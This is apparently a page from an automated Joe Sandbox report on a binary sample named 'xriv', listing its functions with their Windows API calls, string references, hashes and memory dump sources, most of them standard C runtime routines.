Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: bcacc946890f09ab26c4149fcc3c57655339c839bed1d42b38dc3db3ab532c7e
Instruction ID: 87a120526f1c4e5710105be70ac26629fc0fc554d29ae9c6fb4df562a9512bb3
Opcode Fuzzy Hash: bcacc946890f09ab26c4149fcc3c57655339c839bed1d42b38dc3db3ab532c7e
Instruction Fuzzy Hash: E211CB32A01225BBDB319B25DC94B5A3F58FF057B4B14075AE985EB391D730ED00C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 008DA9E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,008DA9D8,008DE000,?,008DA9A0,008DAF26,?,008DE000), ref: 008DA9F8
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008DAA0B
FreeLibrary.KERNEL32(00000000,?,?,008DA9D8,008DE000,?,008DA9A0,008DAF26,?,008DE000), ref: 008DAA2E

Strings

mscoree.dll, xrefs: 008DA9F1
CorExitProcess, xrefs: 008DAA03

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2592d929b4d610992f9111bac62ce5060069f0bfa899c6e5f37818287b506527
Instruction ID: 985a1423dda03f3ed94d625e049a8c2fc3d10935808f308ba80d2704691f53f0
Opcode Fuzzy Hash: 2592d929b4d610992f9111bac62ce5060069f0bfa899c6e5f37818287b506527
Instruction Fuzzy Hash: 14F08C30600669FBDB159B91DE09B9E7BA8FB0475AF100264BA00E62A0CB788E00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008E6069 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00F7F658,00F7F658,?,7FFFFFFF,?,?,008E6325,00F7F658,00F7F658,?,00F7F658,?,?,?,?,00F7F658), ref: 008E610C
__alloca_probe_16.LIBCMT ref: 008E61C2
__alloca_probe_16.LIBCMT ref: 008E6258
__freea.LIBCMT ref: 008E62C3
__freea.LIBCMT ref: 008E62CF

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 53df978b97239952eb80f3602bdb1e95813aa923fc9a362582fe3077fb1264d1
Instruction ID: ee1586a39d45a746f1ca5fe29d082ea07e2d8e43b24da428209415ac5cfded32
Opcode Fuzzy Hash: 53df978b97239952eb80f3602bdb1e95813aa923fc9a362582fe3077fb1264d1
Instruction Fuzzy Hash: 6F81A572D00299ABDF219E968C41AEE7BB5FF6B3A4F190155E904F7241F621CC60CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008E4994 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 008E4A18
__alloca_probe_16.LIBCMT ref: 008E4ADE
__freea.LIBCMT ref: 008E4B4A

Part of subcall function 008DDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,008D8272,?,?,?,?,?,008C20C3,?,?), ref: 008DDB6E

__freea.LIBCMT ref: 008E4B53
__freea.LIBCMT ref: 008E4B76

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: df0e3cf4e3dd6a0e63074f913dfb92af0d7a2c07d9bc0eec2238a03701b1ab1b
Instruction ID: e1197b0f5e189eb50f96a378994631d1d4224854abe720386ff3b4c0449d5661
Opcode Fuzzy Hash: df0e3cf4e3dd6a0e63074f913dfb92af0d7a2c07d9bc0eec2238a03701b1ab1b
Instruction Fuzzy Hash: 2451E572500256ABEB205FA69C41FBF77A9FF82774F194129FC18E7141E734DC1086A1

Uniqueness

Uniqueness Score: -1.00%

Function 008DB1AE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008DB0E0), ref: 008DB1D0
GetFileInformationByHandle.KERNEL32(?,?), ref: 008DB22A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,008DB0E0,?,000000FF,00000000,00000000), ref: 008DB2B8
__dosmaperr.LIBCMT ref: 008DB2BF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 008DB2FC

Part of subcall function 008DB524: __dosmaperr.LIBCMT ref: 008DB559

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 796d6061100f79fe7da7ecd14db91d7563ab096c1bbaa3700c4981fdd7223edc
Instruction ID: e90272fa493545c7faa18da6c5222ac6d9bdcca562f2a8ee1369afbb6462ff8f
Opcode Fuzzy Hash: 796d6061100f79fe7da7ecd14db91d7563ab096c1bbaa3700c4981fdd7223edc
Instruction Fuzzy Hash: B2413B76900648EBDB24DFB9D8459AFBBF9FF89700B01462AF856D3311EB309840DB21

Uniqueness

Uniqueness Score: -1.00%

Function 008E139C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008E13B4

Part of subcall function 008DD653: HeapFree.KERNEL32(00000000,00000000,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?), ref: 008DD669
Part of subcall function 008DD653: GetLastError.KERNEL32(?,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?,?), ref: 008DD67B

_free.LIBCMT ref: 008E13C6
_free.LIBCMT ref: 008E13D8
_free.LIBCMT ref: 008E13EA
_free.LIBCMT ref: 008E13FC

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 96f0818b86ef5658c615802172e882be86775d841484ccccec89fad8fa4bc0b3
Instruction ID: e7babe048852f869c94b75733ff624f35c0e408d86fe2f1badf86437578a44df
Opcode Fuzzy Hash: 96f0818b86ef5658c615802172e882be86775d841484ccccec89fad8fa4bc0b3
Instruction Fuzzy Hash: B6F0FF72504240A7CB20EB6AF88AD1A73DAFA15B547644D06F05CD7B41CB34FCC0CAE9

Uniqueness

Uniqueness Score: -1.00%

Function 008DFA69 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008DFC03

Strings

*?, xrefs: 008DFAAC

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
Instruction ID: 7c511f997c7a47d081d4b9c3dfaa327cfdaec269107cea5a30ee5c6112dc474e
Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
Instruction Fuzzy Hash: AE614C75D002199FCB14CFA9C8819EDFBF5FF48324B24826BE915E7301D671AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 008CE4E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 008CEE6A
std::_Xinvalid_argument.LIBCPMT ref: 008CEE79

Strings

stoi argument out of range, xrefs: 008CE4C4, 008CEE7E
invalid stoi argument, xrefs: 008CE4B0, 008CEE65, 008CEE74

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: invalid stoi argument$stoi argument out of range
API String ID: 909987262-1606216832
Opcode ID: 69241054691e8b27758a0ffd43dbcdec823aabd2db8e7deaddef27071e8929fd
Instruction ID: 639e7b0083d0dd74fc9cfbc305586ded0c345518e5794b05440d26cc94ae7898
Opcode Fuzzy Hash: 69241054691e8b27758a0ffd43dbcdec823aabd2db8e7deaddef27071e8929fd
Instruction Fuzzy Hash: 300184B190035CEFDB20EF68CC46B9ABBB8FB05700F104159F524A7381DF745A448BA6

Uniqueness

Uniqueness Score: -1.00%

Function 008D8970 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008D8A37
___AdjustPointer.LIBCMT ref: 008D8A5A
___AdjustPointer.LIBCMT ref: 008D8AF6

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: bb33cff0a2eb4c04ff4e964e1619506528cde10ff9d36c3abd73c895894511dc
Instruction ID: a7144ecf0ba1af8ed509c6f54f0a963fe25c8d8f4d35728685c34468c5fe175b
Opcode Fuzzy Hash: bb33cff0a2eb4c04ff4e964e1619506528cde10ff9d36c3abd73c895894511dc
Instruction Fuzzy Hash: 9A51BC72600226EFDB289F59D841B7A77A4FF00715F24022FE945DA791EF31AC90CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008C4D10 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,16D98AA8,00000000), ref: 008C4D89
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C4DF0
GetProcAddress.KERNEL32(00000000), ref: 008C4DF7

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 21f20b9fa6e97dd5f5d357b79029a96c1bb9e46f34acb6bb90f4257c5621d40c
Instruction ID: c154cdeb998f6e4c2548ce9732e33c4e54eab114dcfa3ea4f1bad3a14cef3007
Opcode Fuzzy Hash: 21f20b9fa6e97dd5f5d357b79029a96c1bb9e46f34acb6bb90f4257c5621d40c
Instruction Fuzzy Hash: 0051F3709002589BEB14EB68CD89BEDBB75FB45320F5042ADE415E73C1EB358AC08B92

Uniqueness

Uniqueness Score: -1.00%

Function 008E4FCE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008E509E
_free.LIBCMT ref: 008E50C7
SetEndOfFile.KERNEL32(00000000,008E25FD,00000000,008DD4F0,?,?,?,?,?,?,?,008E25FD,008DD4F0,00000000), ref: 008E50F9
GetLastError.KERNEL32(?,?,?,?,?,?,?,008E25FD,008DD4F0,00000000,?,?,?,?,00000000), ref: 008E5115

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 1c8c26bae35e8ef7bd7fe4f823f73b1633d25f7e44f5fc58279cb4dfb4e951d2
Instruction ID: a19882f6165bc2ca5594467ac808a85ee7f34c2265c6e9bd22e92eab63c90e7f
Opcode Fuzzy Hash: 1c8c26bae35e8ef7bd7fe4f823f73b1633d25f7e44f5fc58279cb4dfb4e951d2
Instruction Fuzzy Hash: 3241FD72900E899BDB11AB7ECC42B5D37B5FF46374F150611F425D7292EB70D94047A2

Uniqueness

Uniqueness Score: -1.00%

Function 008DF99A Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 008DAE0F: _free.LIBCMT ref: 008DAE1D

Part of subcall function 008E0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,008E4B40,?,00000000,00000000), ref: 008E0A13

GetLastError.KERNEL32 ref: 008DFA02
__dosmaperr.LIBCMT ref: 008DFA09
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 008DFA48
__dosmaperr.LIBCMT ref: 008DFA4F

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3fc05bcdb4fa7490ebda3c7d456168abcb58dc7fc01da2c7841b8b13244aa6f4
Instruction ID: 66cf7d7146ca52f7af62de0bf990e8a8995e13c9617bb7194abb267285f32acf
Opcode Fuzzy Hash: 3fc05bcdb4fa7490ebda3c7d456168abcb58dc7fc01da2c7841b8b13244aa6f4
Instruction Fuzzy Hash: 9A21B871600619BF9B10AF698C81927B7ADFF453687104736FA1AD7343EB30ED40AB91

Uniqueness

Uniqueness Score: -1.00%

Function 008DDF44 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,008DAD8D,00000000,?,?,?,008DAF26,?), ref: 008DDF49
_free.LIBCMT ref: 008DDFA6
_free.LIBCMT ref: 008DDFDC
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,008DAF26,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 1db4a2823dc7679e883be8abf2843243bb765f320e4bf57cb02c1765d5891f22
Instruction ID: f1ca5fbcd11eebeaf43684b2c75618f2fae58429814fc7283a62fef738f8b66a
Opcode Fuzzy Hash: 1db4a2823dc7679e883be8abf2843243bb765f320e4bf57cb02c1765d5891f22
Instruction Fuzzy Hash: 98117032208B056A97113BBDAC85E3A276AFBD1779B250327F226CB391DE618C428155

Uniqueness

Uniqueness Score: -1.00%

Function 008DE09B Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,008DB7F5,008DDB7F,?,?,008D8272,?,?,?,?,?,008C20C3,?,?), ref: 008DE0A0
_free.LIBCMT ref: 008DE0FD
_free.LIBCMT ref: 008DE133
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,008D8272,?,?,?,?,?,008C20C3,?,?), ref: 008DE13E

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 32e56229eddf26b7848c0fe04d2bd3fcaa9ca7fb37c6ccf9d876f2cf8c67bfef
Instruction ID: 4b96430b72da02e034bd2ef003fc3925ef6235f4ddac384aaa4534fc10e49dc8
Opcode Fuzzy Hash: 32e56229eddf26b7848c0fe04d2bd3fcaa9ca7fb37c6ccf9d876f2cf8c67bfef
Instruction Fuzzy Hash: FB118232304A056ADB113778AC85E3B376AFBC1779B250326F128CB3D1DEB18C82C161

Uniqueness

Uniqueness Score: -1.00%

Function 008DE8E6 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,008DE9E2,00000000,?,008E3695,00000000,00000000,008DE9E2,?,?,00000000,00000000,00000001), ref: 008DE8FC
GetLastError.KERNEL32(?,008E3695,00000000,00000000,008DE9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,008DE9E2,00000000,00000104), ref: 008DE906
__dosmaperr.LIBCMT ref: 008DE90D

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: b91cc05a1e6346fed2337bbf38e6599d888f2a565cfd1175f94b30b27284f71d
Instruction ID: 254b1eda0b4d5c6ac2746cafbf1428ee75cade26110111dc90d31ed9c3a12caf
Opcode Fuzzy Hash: b91cc05a1e6346fed2337bbf38e6599d888f2a565cfd1175f94b30b27284f71d
Instruction Fuzzy Hash: 4CF0813260111ABB8B202FA6CC48D5ABFA9FF843B03054616F51CCA620CB31E851CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 008DE87D Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,008DE9E2,00000000,?,008E370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 008DE893
GetLastError.KERNEL32(?,008E370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,008DE9E2,00000000,00000104,?), ref: 008DE89D
__dosmaperr.LIBCMT ref: 008DE8A4

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: ade68d93a5c0495defdef27ccef1cf5b4653d0a7fbc704217c2ee0a2bc0a59c6
Instruction ID: 4fc7d6a1911cd6007ef513abcd9897a9ac589328cb042900e7c435903c7ec880
Opcode Fuzzy Hash: ade68d93a5c0495defdef27ccef1cf5b4653d0a7fbc704217c2ee0a2bc0a59c6
Instruction Fuzzy Hash: 66F03132600159BBCB207FA6DC48956BFAAFF557A03014A22F51DCA620CB31E851EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 008E638F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(008C5140,0000000F,008F68F8,00000000,008C5140,?,008E5AA7,008C5140,00000001,008C5140,008C5140,?,008E2ECD,00000000,?,008C5140), ref: 008E63A6
GetLastError.KERNEL32(?,008E5AA7,008C5140,00000001,008C5140,008C5140,?,008E2ECD,00000000,?,008C5140,00000000,008C5140,?,008E3421,008C5140), ref: 008E63B2

Part of subcall function 008E6378: CloseHandle.KERNEL32(FFFFFFFE,008E63C2,?,008E5AA7,008C5140,00000001,008C5140,008C5140,?,008E2ECD,00000000,?,008C5140,00000000,008C5140), ref: 008E6388

___initconout.LIBCMT ref: 008E63C2

Part of subcall function 008E633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,008E6369,008E5A94,008C5140,?,008E2ECD,00000000,?,008C5140,00000000), ref: 008E634D

WriteConsoleW.KERNEL32(008C5140,0000000F,008F68F8,00000000,?,008E5AA7,008C5140,00000001,008C5140,008C5140,?,008E2ECD,00000000,?,008C5140,00000000), ref: 008E63D7

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 7e1f002e50475e3d7b78c5753a86aa46be86b8fb3ef72c34b5313b0b39d24812
Instruction ID: 769d5cc1d7960786dfd367b8282e5e0d5b76233cc8fe309a999bf8b9222b84e2
Opcode Fuzzy Hash: 7e1f002e50475e3d7b78c5753a86aa46be86b8fb3ef72c34b5313b0b39d24812
Instruction Fuzzy Hash: 29F030365006A5FBCF225F96EC44E9A3F66FB1A3B5B004014FA28D5330DA728D30DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008D71BA Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,008D7157,00000064), ref: 008D71DD
LeaveCriticalSection.KERNEL32(008F9708,000000FF,?,008D7157,00000064,?,?,?,008C3E30,008FC468,16D98AA8,?,00000000,008E8818,000000FF), ref: 008D71E7
WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,008D7157,00000064,?,?,?,008C3E30,008FC468,16D98AA8,?,00000000,008E8818,000000FF), ref: 008D71F8
EnterCriticalSection.KERNEL32(008F9708,?,008D7157,00000064,?,?,?,008C3E30,008FC468,16D98AA8,?,00000000,008E8818,000000FF), ref: 008D71FF

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
